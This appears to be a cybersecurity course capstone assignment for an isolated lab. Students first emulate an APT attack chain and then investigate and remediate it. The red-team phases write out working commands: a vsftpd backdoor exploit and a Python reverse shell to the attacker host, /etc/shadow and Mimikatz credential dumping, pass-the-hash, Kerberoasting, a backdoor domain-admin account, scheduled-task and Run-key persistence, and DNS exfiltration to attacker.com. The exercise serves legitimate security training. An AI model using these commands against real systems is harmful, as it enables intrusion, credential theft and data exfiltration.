# CAPSTONE PROJECT: Operation Serpent's Shadow ## Advanced Persistent Threat (APT) Simulation & Incident Response **Duration**: 24-30 hours **Points**: 200 (Red Team: 100pts, Blue Team: 100pts) **Prerequisites**: MOD0-MOD8 completion **Difficulty**: Advanced --- ## Executive Summary **Operation Serpent's Shadow** is a comprehensive capstone exercise simulating a sophisticated APT campaign against the Apophis Networking infrastructure. You will first act as the **Red Team** executing a 7-phase attack campaign, then switch roles to become the **Blue Team** investigating and responding to your own intrusion. This capstone tests your ability to: - Execute complex multi-stage attacks using techniques from MITRE ATT&CK - Maintain operational security while achieving attack objectives - Detect, analyze, and respond to advanced threats - Document findings in professional incident response reports - Apply threat intelligence to real-world scenarios **Scenario**: A nation-state APT group (codename: SERPENT SYNDICATE) has targeted Apophis Networking to steal intellectual property and maintain persistent access. You will emulate this threat actor, then hunt and remediate the intrusion. --- ## Learning Objectives By completing this capstone, you will demonstrate: 1. **Red Team Skills**: - Multi-phase attack chain execution (reconnaissance → persistence) - Evasion of security controls (IDS/IPS, EDR simulation) - Credential harvesting and lateral movement - Data exfiltration techniques - OPSEC and TTPs documentation 2. **Blue Team Skills**: - Security log analysis across multiple sources (SIEM, firewall, endpoint) - Intrusion detection and alert triage - Digital forensics (disk, memory, network) - Incident response lifecycle (NIST PICERL) - Threat intelligence correlation (MITRE ATT&CK mapping) - Remediation and hardening recommendations 3. **Professional Skills**: - Technical report writing - Timeline reconstruction - Executive briefing creation - Post-incident review documentation --- ## Lab Environment ### Network Topology ``` VLAN 100 (Management) : 10.10.1.0/24 - Proxmox, pfSense VLAN 200 (Red Team) : 10.10.2.0/24 - Kali Linux VLAN 300 (Blue Team) : 10.10.3.0/24 - Security Onion VLAN 400 (Victim Network): 10.10.4.0/24 - Target Systems ``` ### Target Systems (VLAN 400) 1. **DC01** (10.10.4.10) - Windows Server 2022 Domain Controller - Domain: `apophis.local` - Services: AD, DNS, LDAP, Kerberos 2. **WS01** (10.10.4.20) - Windows 10 Workstation (HR Department) - Domain-joined - User: `hruser` (Domain Users group) 3. **WS02** (10.10.4.21) - Windows 10 Workstation (IT Admin) - Domain-joined - User: `itadmin` (Domain Admins group - simulated compromised admin) 4. **WEB01** (10.10.4.30) - DVWA Web Server (Ubuntu + Docker) - Services: HTTP (80), SSH (22), MySQL (3306) 5. **FILE01** (10.10.4.40) - Metasploitable 2 (Legacy File Server) - Services: FTP (21), SMB (445), SSH (22) ### Attack Infrastructure (VLAN 200) - **Kali Linux** (10.10.2.50) - Tools: Nmap, Metasploit, Impacket, BloodHound, Responder, Mimikatz ### Monitoring Infrastructure (VLAN 300) - **Security Onion** (10.10.3.100) - SIEM: Kibana/Elasticsearch - IDS/IPS: Suricata - Network Forensics: Zeek (Bro), PCAP --- ## PHASE 1: RED TEAM OPERATION (100 Points) ### Pre-Engagement Checklist Before starting the attack campaign: 1. **Create Attack VM Snapshot**: `Kali_PreAttack_Snapshot` 2. **Create Target VM Snapshots**: Snapshot all VLAN 400 systems 3. **Verify Network Isolation**: Confirm VLAN segmentation and firewall rules 4. **Start Security Onion**: Ensure all sensors are running 5. **Create Attack Log Directory**: ```bash mkdir -p ~/capstone/red_team/{logs,screenshots,loot,exfil} script ~/capstone/red_team/logs/attack_$(date +%Y%m%d_%H%M%S).log ``` --- ### Attack Phase 1: External Reconnaissance (10 Points) **Objective**: Map the external attack surface without triggering alerts. **TTPs**: MITRE ATT&CK - TA0043 (Reconnaissance) **Tasks**: 1. **Passive Reconnaissance**: ```bash # Simulated OSINT gathering (document in report) echo "apophis.local" > targets.txt echo "10.10.4.0/24" >> targets.txt # DNS enumeration (if DNS is exposed) dig @10.10.4.10 apophis.local ANY dig @10.10.4.10 apophis.local AXFR ``` 2. **Active Network Scanning**: ```bash # Stealthy host discovery (SYN scan, no ICMP) sudo nmap -sS -Pn -T2 --max-retries 1 -oA recon/syn_scan 10.10.4.0/24 # Service enumeration on discovered hosts sudo nmap -sV -sC -p- --open -T3 -oA recon/service_scan 10.10.4.0/24 ``` 3. **SMB/NetBIOS Enumeration**: ```bash # Enumerate SMB shares and users enum4linux -a 10.10.4.10 | tee recon/enum4linux_dc01.txt smbclient -L //10.10.4.40 -N | tee recon/smbshares_file01.txt ``` **Deliverables**: - [ ] Nmap scan results (XML + screenshot) - [ ] Network topology diagram with discovered hosts/services - [ ] Target prioritization list (justify choices) **Assessment Criteria** (10pts): - Comprehensive service enumeration (5pts) - Evasion techniques documented (3pts) - Target analysis and prioritization (2pts) --- ### Attack Phase 2: Initial Access (15 Points) **Objective**: Gain initial foothold on the victim network. **TTPs**: MITRE ATT&CK - TA0001 (Initial Access) **Techniques**: T1190 (Exploit Public-Facing Application), T1078 (Valid Accounts) **Scenario**: You discovered FILE01 (Metasploitable 2) running vulnerable vsftpd 2.3.4. **Tasks**: 1. **Exploit vsftpd Backdoor** (from MOD3): ```bash msfconsole -q use exploit/unix/ftp/vsftpd_234_backdoor set RHOSTS 10.10.4.40 set PAYLOAD cmd/unix/interact exploit ``` 2. **Establish Meterpreter Session**: ```bash # Upgrade to full Meterpreter shell # (Use MSFVenom payload + upload via FTP if needed) python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.2.50",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' ``` 3. **System Enumeration**: ```bash # Gather system information uname -a id cat /etc/passwd cat /etc/shadow 2>/dev/null netstat -tulpn ls -la /home ``` **Deliverables**: - [ ] Screenshot of successful exploit - [ ] Output of system enumeration commands - [ ] Screenshot showing `whoami` and `ifconfig` from victim **Assessment Criteria** (15pts): - Successful initial access (10pts) - System enumeration completeness (3pts) - Shell stability and upgrade (2pts) --- ### Attack Phase 3: Credential Access (15 Points) **Objective**: Harvest credentials to enable lateral movement. **TTPs**: MITRE ATT&CK - TA0006 (Credential Access) **Techniques**: T1003 (OS Credential Dumping), T1110 (Brute Force) **Tasks**: 1. **Linux Credential Harvesting** (FILE01): ```bash # Dump /etc/shadow (if accessible) cat /etc/shadow # Search for credentials in config files grep -ri password /var/www/html 2>/dev/null grep -ri password /home 2>/dev/null find / -name "*pass*" -type f 2>/dev/null | head -20 ``` 2. **Password Cracking**: ```bash # Save hashes and crack with John unshadow /tmp/passwd /tmp/shadow > /tmp/unshadowed.txt john --wordlist=/usr/share/wordlists/rockyou.txt /tmp/unshadowed.txt john --show /tmp/unshadowed.txt ``` 3. **Web Application Credential Extraction** (WEB01): ```bash # SQL injection to dump DVWA users (MOD7 techniques) sqlmap -u "http://10.10.4.30/vulnerabilities/sqli/?id=1&Submit=Submit#" \ --cookie="PHPSESSID=" \ --dump -D dvwa -T users ``` 4. **Network Credential Sniffing** (Advanced): ```bash # Responder for NTLM hash capture (if AD communication observed) sudo responder -I eth0 -wrf ``` **Deliverables**: - [ ] Cracked password list (at least 3 accounts) - [ ] Screenshot of John the Ripper output - [ ] Captured NTLM hashes (if applicable) - [ ] SQL injection dump results **Assessment Criteria** (15pts): - Multiple credential sources exploited (7pts) - Successful password cracking (5pts) - Documentation of credential storage locations (3pts) --- ### Attack Phase 4: Lateral Movement (20 Points) **Objective**: Pivot from initial foothold to domain-joined systems. **TTPs**: MITRE ATT&CK - TA0008 (Lateral Movement) **Techniques**: T1021.002 (SMB/Windows Admin Shares), T1550.002 (Pass the Hash) **Scenario**: You obtained credentials for `itadmin` and need to access WS02. **Tasks**: 1. **SMB Authentication Testing**: ```bash # Test credentials against domain systems crackmapexec smb 10.10.4.0/24 -u itadmin -p 'P@ssw0rd123' --shares crackmapexec smb 10.10.4.0/24 -u itadmin -p 'P@ssw0rd123' --local-auth ``` 2. **PSExec Lateral Movement**: ```bash # Gain shell on WS02 using Impacket impacket-psexec 'apophis.local/itadmin:P@ssw0rd123@10.10.4.21' # Alternative: WMIExec impacket-wmiexec 'apophis.local/itadmin:P@ssw0rd123@10.10.4.21' ``` 3. **Kerberoasting Attack** (MOD5 techniques): ```bash # Request service tickets for cracking impacket-GetUserSPNs 'apophis.local/itadmin:P@ssw0rd123' -dc-ip 10.10.4.10 -request # Crack TGS tickets hashcat -m 13100 tgs_tickets.txt /usr/share/wordlists/rockyou.txt --force ``` 4. **BloodHound Enumeration** (Advanced): ```bash # Collect AD data bloodhound-python -d apophis.local -u itadmin -p 'P@ssw0rd123' \ -ns 10.10.4.10 -c all # Import into BloodHound GUI and analyze shortest path to Domain Admins ``` **Deliverables**: - [ ] Screenshot of successful lateral movement to WS02 - [ ] CrackMapExec output showing access to multiple systems - [ ] Kerberoast TGS tickets (if obtained) - [ ] BloodHound attack path graph (screenshot) **Assessment Criteria** (20pts): - Successful lateral movement to domain system (10pts) - Use of multiple techniques (5pts) - Active Directory enumeration completeness (5pts) --- ### Attack Phase 5: Privilege Escalation & Persistence (20 Points) **Objective**: Escalate to Domain Admin and establish persistent access. **TTPs**: MITRE ATT&CK - TA0004 (Privilege Escalation), TA0003 (Persistence) **Techniques**: T1068 (Exploitation for Privilege Escalation), T1136 (Create Account), T1547 (Boot/Logon Autostart) **Tasks**: 1. **Mimikatz Credential Dumping** (WS02): ```powershell # On compromised WS02 system mimikatz.exe privilege::debug sekurlsa::logonpasswords lsadump::sam lsadump::secrets ``` 2. **Pass-the-Hash to Domain Controller**: ```bash # Use captured NTLM hash to access DC01 impacket-psexec -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 'apophis.local/Administrator@10.10.4.10' ``` 3. **Create Backdoor Domain Account**: ```powershell # On DC01 net user backdoor P@ssw0rd123! /add /domain net group "Domain Admins" backdoor /add /domain net user backdoor ``` 4. **Scheduled Task Persistence** (WS02): ```powershell # Create scheduled task for Meterpreter callback schtasks /create /tn "Windows Update Check" /tr "C:\Windows\Temp\update.exe" \ /sc onlogon /ru SYSTEM /f ``` 5. **Registry Persistence** (Alternative): ```powershell # Add Run key reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" \ /v SecurityUpdate /t REG_SZ /d "C:\Windows\Temp\update.exe" /f ``` **Deliverables**: - [ ] Screenshot of Mimikatz credential dump - [ ] Proof of Domain Admin access (screenshot of `whoami /groups` on DC01) - [ ] Backdoor account creation evidence - [ ] Persistence mechanism documentation (scheduled task/registry) **Assessment Criteria** (20pts): - Domain Admin privileges achieved (10pts) - Credential dumping success (5pts) - Persistence mechanisms installed (3pts) - Stealth considerations documented (2pts) --- ### Attack Phase 6: Data Exfiltration (10 Points) **Objective**: Locate and exfiltrate sensitive data. **TTPs**: MITRE ATT&CK - TA0010 (Exfiltration) **Techniques**: T1041 (Exfiltration Over C2 Channel), T1048 (Exfiltration Over Alternative Protocol) **Tasks**: 1. **Data Discovery**: ```powershell # Search for sensitive files Get-ChildItem -Path C:\ -Include *.docx,*.xlsx,*.pdf -Recurse -ErrorAction SilentlyContinue | Where-Object { $_.Length -lt 10MB } | Select-Object FullName, Length # Search for "confidential" or "password" in file contents findstr /si "password" C:\Users\*.txt C:\Users\*.docx ``` 2. **Exfiltration via HTTP**: ```bash # On Kali (setup listener) sudo python3 -m http.server 8080 # On victim (download via curl/wget) certutil -urlcache -f http://10.10.2.50:8080/file.zip C:\Windows\Temp\file.zip ``` 3. **DNS Exfiltration** (Stealth technique): ```powershell # Encode data in DNS queries (simulate) $data = [Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes("SECRET_DATA")) nslookup "$data.attacker.com" 10.10.2.50 ``` 4. **Simulate Intellectual Property Theft**: ```powershell # Create fake sensitive document on DC01 echo "Apophis Networking - Proprietary Research Data" > C:\Shares\Research\IP_Data.txt # Compress and exfiltrate Compress-Archive -Path C:\Shares\Research\* -DestinationPath C:\Windows\Temp\exfil.zip # Transfer using Meterpreter 'download' command ``` **Deliverables**: - [ ] List of discovered sensitive files (screenshot) - [ ] Screenshot of successful exfiltration - [ ] Network capture showing exfiltration traffic (PCAP) - [ ] Exfiltrated file samples (in `~/capstone/red_team/exfil/`) **Assessment Criteria** (10pts): - Data discovery methodology (4pts) - Successful exfiltration (4pts) - Stealth techniques used (2pts) --- ### Attack Phase 7: Red Team Reporting (10 Points) **Objective**: Document the attack chain for Blue Team analysis. **Tasks**: 1. **Create Attack Timeline**: - Document each phase with timestamps - Include all commands executed - Note which actions likely triggered alerts 2. **MITRE ATT&CK Mapping**: - Map each technique to ATT&CK framework - Create coverage matrix (Tactics vs Techniques) - Export for dashboard integration 3. **Indicators of Compromise (IOCs)**: - File paths created: `C:\Windows\Temp\update.exe` - Registry keys modified: `HKLM\...\Run\SecurityUpdate` - Network connections: `10.10.2.50:4444` (Meterpreter) - User accounts created: `backdoor` - Scheduled tasks: `Windows Update Check` 4. **Red Team Report Structure**: ```markdown # Red Team Report: Operation Serpent's Shadow ## Executive Summary - Attack duration: X hours - Systems compromised: 5/5 (100%) - Privileges gained: Domain Admin - Data exfiltrated: XX MB ## Attack Chain [Phase 1] External Recon → [Phase 2] Initial Access (FILE01) → [Phase 3] Credential Harvesting → [Phase 4] Lateral Movement (WS02) → [Phase 5] Domain Admin (DC01) + Persistence → [Phase 6] Data Exfiltration ## Techniques Used [MITRE ATT&CK mapping table] ## Indicators of Compromise [IOC list] ## Detection Gaps Identified [Where Blue Team should have caught you] ``` **Deliverables**: - [ ] Complete Red Team report (PDF format) - [ ] MITRE ATT&CK Navigator JSON file - [ ] IOC list (CSV format) - [ ] Complete command log from `script` session **Assessment Criteria** (10pts): - Report completeness and professionalism (5pts) - Accurate MITRE ATT&CK mapping (3pts) - Comprehensive IOC documentation (2pts) --- ## PHASE 2: BLUE TEAM OPERATION (100 Points) ### Pre-Investigation Checklist Before starting the Blue Team phase: 1. **Preserve Evidence**: - Create forensic snapshots of all compromised VMs - Copy Security Onion logs: `/nsm/sensor_data/` - Export SIEM data from Kibana (last 24 hours) 2. **Establish Blue Team Workspace**: ```bash mkdir -p ~/capstone/blue_team/{forensics,pcaps,logs,reports,timeline} script ~/capstone/blue_team/logs/investigation_$(date +%Y%m%d_%H%M%S).log ``` 3. **Review Red Team Report** (IOCs only - not methodology yet): - Extract IOC list to use as detection baseline - Do NOT review attack methodology - simulate real-world blind investigation --- ### Investigation Phase 1: Detection & Triage (15 Points) **Objective**: Identify security alerts and determine scope of compromise. **Tasks**: 1. **SIEM Alert Review** (Security Onion Kibana): ```kql # High severity alerts in last 24 hours event.severity: high OR event.severity: critical | stats count by rule.name, source.ip, destination.ip # Suspicious network connections to VLAN 200 destination.ip: 10.10.2.* AND event.category: network # Authentication anomalies event.category: authentication AND event.outcome: failure | stats count by user.name, source.ip ``` 2. **Suricata Alert Analysis**: ```bash # Review IDS alerts sudo cat /var/log/suricata/fast.log | grep -E "ET|MALWARE|EXPLOIT" # Extract unique alert signatures jq -r '.alert.signature' /var/log/suricata/eve.json | sort -u ``` 3. **Zeek Log Analysis**: ```bash # Identify unusual connections zeek-cut id.orig_h id.resp_h id.resp_p proto < /nsm/zeek/logs/current/conn.log | sort | uniq -c | sort -rn | head -20 # DNS queries to suspicious domains zeek-cut query answers < /nsm/zeek/logs/current/dns.log | grep -v ".local" ``` 4. **Initial Hypothesis**: - Document which systems appear compromised - Identify likely attack entry point - Estimate timeline of initial compromise **Deliverables**: - [ ] Top 10 critical alerts (screenshot) - [ ] Network connection matrix (source → dest mapping) - [ ] Initial incident triage report (1-2 pages) **Assessment Criteria** (15pts): - Alert prioritization and triage (7pts) - Correct identification of compromised systems (5pts) - Timeline accuracy (3pts) --- ### Investigation Phase 2: Network Forensics (15 Points) **Objective**: Analyze network traffic to reconstruct attack activities. **Tasks**: 1. **PCAP Analysis** (Wireshark): ```bash # Export suspicious traffic from Security Onion sudo tcpdump -r /nsm/sensor_data/securityonion-eth1/dailylogs/*.pcap \ 'host 10.10.2.50 or host 10.10.4.40' \ -w ~/capstone/blue_team/pcaps/attack_traffic.pcap ``` 2. **Identify C2 Communication**: - Filter for connections to Kali (10.10.2.50) - Look for Meterpreter beacons (TCP 4444, HTTP reverse shells) - Identify exfiltration channels 3. **Extract Artifacts from PCAP**: ```bash # Export HTTP objects (potential exfil data) tshark -r attack_traffic.pcap --export-objects http,/tmp/http_objects/ # SMB file transfers tshark -r attack_traffic.pcap -Y "smb2.cmd == 0x0009" -T fields \ -e frame.time -e ip.src -e ip.dst -e smb2.filename ``` 4. **Protocol Analysis**: - Document SMB sessions (lateral movement) - Kerberos TGT/TGS requests (Kerberoasting) - DNS queries (potential DNS tunneling) - HTTP POST requests (data exfiltration) **Deliverables**: - [ ] Annotated PCAP with attack traffic highlighted - [ ] Screenshot of C2 communication in Wireshark - [ ] Extracted artifacts (HTTP objects, SMB files) - [ ] Network forensics report (protocol breakdown) **Assessment Criteria** (15pts): - Correct identification of attack traffic (7pts) - C2 channel analysis (5pts) - Artifact extraction completeness (3pts) --- ### Investigation Phase 3: Host Forensics (20 Points) **Objective**: Perform disk and memory forensics on compromised systems. **Tasks**: 1. **Disk Forensics with Autopsy** (FILE01 - Initial Access Point): ```bash # Create disk image sudo dd if=/dev/sda of=~/capstone/blue_team/forensics/file01.dd bs=4M status=progress # Import into Autopsy and analyze: # - Timeline of file modifications # - Deleted files recovery # - Web history / bash history # - Malware artifacts ``` 2. **Memory Forensics with Volatility** (WS02 - Lateral Movement Target): ```bash # Capture memory dump (from Proxmox or use FTK Imager) # Analyze with Volatility 3 python3 vol.py -f ws02_memory.raw windows.info python3 vol.py -f ws02_memory.raw windows.pslist python3 vol.py -f ws02_memory.raw windows.netscan python3 vol.py -f ws02_memory.raw windows.malfind python3 vol.py -f ws02_memory.raw windows.dumpfiles --pid ``` 3. **Windows Event Log Analysis** (DC01): ```powershell # Security event logs (authentication) Get-WinEvent -LogName Security -FilterXPath "*[System[EventID=4624 or EventID=4625 or EventID=4672]]" | Where-Object { $_.TimeCreated -gt (Get-Date).AddHours(-24) } | Select-Object TimeCreated, Id, Message # Logon events (type 3 = network, type 10 = remote interactive) Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4624} | Where-Object { $_.Properties[8].Value -eq 3 -or $_.Properties[8].Value -eq 10 } # Account creation events Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4720} ``` 4. **Registry Forensics** (Persistence Mechanisms): ```powershell # Check Run keys Get-ItemProperty "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run" # Scheduled tasks Get-ScheduledTask | Where-Object { $_.Principal.UserId -eq "SYSTEM" } | Select-Object TaskName, TaskPath, Date # Services Get-Service | Where-Object { $_.StartType -eq "Automatic" -and $_.Status -eq "Running" } ``` **Deliverables**: - [ ] Autopsy case report with timeline - [ ] Volatility analysis results (processes, network connections) - [ ] Windows Event Log summary (authentication anomalies) - [ ] Registry forensics findings (persistence mechanisms) **Assessment Criteria** (20pts): - Disk forensics completeness (7pts) - Memory forensics quality (7pts) - Event log analysis (4pts) - Persistence mechanism identification (2pts) --- ### Investigation Phase 4: Incident Response (NIST PICERL) (20 Points) **Objective**: Execute full incident response lifecycle. **NIST PICERL Framework**: 1. **Preparation** (Already completed - lab setup) 2. **Identification** (Completed in Phase 1) 3. **Containment** (Short-term and Long-term) 4. **Eradication** (Remove attacker presence) 5. **Recovery** (Restore services) 6. **Lessons Learned** (Post-incident review) **Tasks**: 1. **Containment Actions**: ```bash # Short-term: Isolate compromised systems # On pfSense, block Kali IP pfctl -t blocklist -T add 10.10.2.50 # Disable backdoor account net user backdoor /active:no # Kill suspicious processes (on WS02) Get-Process | Where-Object { $_.Path -like "*\Temp\*" } | Stop-Process -Force ``` 2. **Eradication**: ```powershell # Remove malware artifacts Remove-Item "C:\Windows\Temp\update.exe" -Force # Remove persistence mechanisms schtasks /delete /tn "Windows Update Check" /f reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v SecurityUpdate /f # Delete backdoor account net user backdoor /delete /domain # Reset compromised accounts net user itadmin NewP@ssw0rd123! /domain ``` 3. **Recovery**: ```powershell # Restore from clean snapshots (if available) # Rebuild compromised systems # Verify AD integrity dcdiag /v > dcdiag_output.txt repadmin /replsummary # Reset Kerberos keys ksetup /setenctypeattr apophis.local AES256-CTS-HMAC-SHA1-96 ``` 4. **Hardening Recommendations**: - Enable LSASS protection: `Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" -Name "RunAsPPL" -Value 1` - Implement tiered admin model - Deploy EDR solution (simulate with Sysmon) - Update firewall rules (segment VLANs further) **Deliverables**: - [ ] Containment action log (timestamped) - [ ] Eradication checklist (completed tasks) - [ ] System recovery documentation - [ ] Hardening recommendations report (5+ actionable items) **Assessment Criteria** (20pts): - Proper NIST PICERL execution (10pts) - Completeness of eradication (5pts) - Quality of hardening recommendations (5pts) --- ### Investigation Phase 5: Threat Intelligence & Attribution (15 Points) **Objective**: Map attack to MITRE ATT&CK and perform threat actor profiling. **Tasks**: 1. **MITRE ATT&CK Mapping**: - Create spreadsheet mapping observed TTPs to ATT&CK techniques - Use ATT&CK Navigator to visualize coverage - Identify gaps in detection coverage 2. **Threat Actor Profiling**: ```markdown # Threat Actor: SERPENT SYNDICATE (Simulated APT) **Sophistication Level**: Advanced **Observed TTPs**: - Initial Access: T1190 (Exploit Public-Facing Application) - Credential Access: T1003 (OS Credential Dumping) - Lateral Movement: T1021.002 (SMB/Windows Admin Shares) - Persistence: T1136 (Create Account), T1053 (Scheduled Task) - Exfiltration: T1041 (C2 Channel) **Tools Used**: - Metasploit Framework - Impacket suite - Mimikatz - Custom PowerShell scripts **Targeting**: Intellectual property theft, persistent access **Comparison**: Similar to APT29 (Cozy Bear) - use of living-off-the-land techniques ``` 3. **IOC Generation for Threat Intelligence Platforms**: ```csv indicator,type,severity,context 10.10.2.50,ipv4,high,C2 Server update.exe,filename,critical,Persistent malware backdoor,username,critical,Rogue domain account "Windows Update Check",scheduled_task,high,Persistence mechanism C:\Windows\Temp\*,filepath,medium,Malware staging directory ``` 4. **Dashboard Integration** (MOD8 Link): - Export MITRE heatmap JSON to `dashboard/src/data/live/mitre_coverage.json` - Update threat feed with real IOCs - Visualize attack timeline in Incident Tracker component **Deliverables**: - [ ] MITRE ATT&CK Navigator layer file (JSON) - [ ] Threat actor profile report (2-3 pages) - [ ] IOC list in STIX format (or CSV) - [ ] Dashboard integration (screenshot of updated heatmap) **Assessment Criteria** (15pts): - Accurate MITRE ATT&CK mapping (7pts) - Threat actor profiling quality (5pts) - IOC quality and completeness (3pts) --- ### Investigation Phase 6: Final IR Report (15 Points) **Objective**: Create comprehensive incident response report for executive leadership. **Report Structure** (Use `LAB_REPORT_TEMPLATE.md` as base): ```markdown # Incident Response Report: Operation Serpent's Shadow ## Security Incident #2026-001 **Classification**: CONFIDENTIAL **Date**: [Current Date] **Incident Handler**: [Your Name] **Severity**: CRITICAL --- ## Executive Summary (1 page) - **What Happened**: Brief overview of the incident - **Impact**: Systems compromised, data exfiltrated - **Root Cause**: Unpatched vsftpd vulnerability on legacy server - **Remediation Status**: All threats eradicated, systems hardened - **Recommendation**: Decommission FILE01, implement vulnerability management program --- ## Incident Timeline (2-3 pages) | Timestamp | Event | System | Action | |-----------|-------|--------|--------| | 2026-02-10 14:23 | Initial scan detected | FILE01 | Suricata alert fired | | 2026-02-10 14:45 | vsftpd exploit successful | FILE01 | Attacker gained shell | | ... | ... | ... | ... | --- ## Technical Analysis (5-7 pages) ### Attack Chain [Detailed walkthrough of each attack phase] ### Network Forensics [PCAP analysis findings] ### Host Forensics [Autopsy/Volatility findings] ### MITRE ATT&CK Mapping [Table of techniques used] --- ## Indicators of Compromise (1 page) [Complete IOC list] --- ## Response Actions (2-3 pages) ### Containment [What was done to stop the attack] ### Eradication [How threats were removed] ### Recovery [How systems were restored] --- ## Lessons Learned (2 pages) ### What Went Well - IDS detected initial scanning activity - Log retention allowed full forensic analysis ### What Could Be Improved - Delayed response to initial alerts (simulated) - Legacy system not in patch management program - No EDR on endpoints ### Recommendations 1. Implement 24/7 SOC monitoring 2. Deploy EDR across all endpoints 3. Decommission Metasploitable 2 (FILE01) 4. Conduct quarterly red team exercises 5. Implement tiered admin model --- ## Appendices - Appendix A: Complete IOC List - Appendix B: MITRE ATT&CK Navigator JSON - Appendix C: Network Topology Diagram - Appendix D: Forensic Evidence Inventory ``` **Deliverables**: - [ ] Final IR report (PDF, 15-20 pages) - [ ] Executive briefing (PowerPoint, 5-7 slides) - [ ] Complete evidence package (ZIP archive) - [ ] Post-incident review presentation **Assessment Criteria** (15pts): - Report professionalism and completeness (7pts) - Technical accuracy (5pts) - Actionable recommendations (3pts) --- ## Final Deliverables Checklist ### Red Team Package (50 Points) - [ ] Attack command logs (`script` output) - [ ] Screenshots (minimum 15) - [ ] Red Team report (PDF) - [ ] MITRE ATT&CK Navigator JSON - [ ] IOC list (CSV) - [ ] Exfiltrated data samples ### Blue Team Package (50 Points) - [ ] Investigation logs - [ ] Forensic images (disk + memory) - [ ] PCAP files with annotations - [ ] Incident Response report (PDF) - [ ] Executive briefing (PPTX) - [ ] Remediation documentation - [ ] Dashboard integration (screenshots) ### Submission Format Create ZIP archive: `CAPSTONE_YourName_OperationSerpentsShadow.zip` ``` CAPSTONE_YourName_OperationSerpentsShadow/ ├── 01_Red_Team/ │ ├── logs/ │ ├── screenshots/ │ ├── loot/ │ ├── exfil/ │ ├── RedTeam_Report.pdf │ └── MITRE_ATT&CK_Layer.json ├── 02_Blue_Team/ │ ├── forensics/ │ ├── pcaps/ │ ├── logs/ │ ├── IR_Report.pdf │ ├── Executive_Briefing.pptx │ └── Remediation_Plan.md └── README.md (submission summary) ``` --- ## Assessment Rubric ### Red Team Assessment (100 Points) | Phase | Criteria | Points | |-------|----------|--------| | Phase 1: Recon | Service enumeration completeness | 10 | | Phase 2: Initial Access | Successful exploitation | 15 | | Phase 3: Credential Access | Multiple credential sources | 15 | | Phase 4: Lateral Movement | Domain system compromise | 20 | | Phase 5: Privilege Escalation | Domain Admin achieved | 20 | | Phase 6: Exfiltration | Data extraction success | 10 | | Phase 7: Reporting | Documentation quality | 10 | ### Blue Team Assessment (100 Points) | Phase | Criteria | Points | |-------|----------|--------| | Phase 1: Detection | Alert triage accuracy | 15 | | Phase 2: Network Forensics | PCAP analysis quality | 15 | | Phase 3: Host Forensics | Disk/memory analysis | 20 | | Phase 4: Incident Response | NIST PICERL execution | 20 | | Phase 5: Threat Intelligence | MITRE ATT&CK mapping | 15 | | Phase 6: Final Report | Professional documentation | 15 | ### Total: 200 Points **Grading Scale**: - 180-200: Exceptional (A) - 160-179: Excellent (B) - 140-159: Good (C) - Below 140: Needs Improvement (Resubmit) --- ## Additional Resources ### Recommended Reading - MITRE ATT&CK Framework: https://attack.mitre.org - NIST SP 800-61r2 (Incident Response Guide) - SANS Incident Response Poster - Red Team Field Manual (RTFM) - Blue Team Field Manual (BTFM) ### Tools Reference - **Red Team**: Metasploit, Impacket, Mimikatz, BloodHound, CrackMapExec - **Blue Team**: Volatility 3, Autopsy, Wireshark, Zeek, Suricata, KQL ### Dashboard Integration - Export MITRE coverage: `dashboard/src/data/live/mitre_coverage.json` - Update threat feed: `dashboard/src/data/live/threat_feed.json` - Timeline visualization: Use `Recharts` LineChart component --- ## Post-Capstone Next Steps After completing this capstone: 1. **Rebuild Lab Environment**: Reset all VMs to clean state 2. **Apply Hardening**: Implement your own remediation recommendations 3. **Re-Attack**: Attempt the same attack chain - what changed? 4. **Advanced Scenarios**: Try different attack paths (web app → AD, phishing simulation) 5. **Contribute to Dashboard**: Add real detection logic to React components --- ## Academic Integrity Statement This capstone represents your own work and understanding of offensive and defensive security operations. You may use: - Official tool documentation - MITRE ATT&CK knowledge base - Course module materials (MOD0-MOD8) You may NOT: - Copy attack scripts without understanding them - Use automated red team frameworks (Cobalt Strike, Covenant) - manual techniques only - Plagiarize reports from online sources **Authorized Use Only**: These techniques are for educational purposes in a controlled lab environment. Unauthorized use against systems you do not own or have explicit permission to test is illegal. --- ## Contact & Support For technical issues: - Review module materials (MOD0-MOD8) - Check `LAB_REPORT_TEMPLATE.md` for report formatting - Consult `ASSESSMENT_RUBRICS.md` for grading criteria **Good luck, and remember**: "Order from Chaos" 🐍 --- **END OF CAPSTONE PROJECT**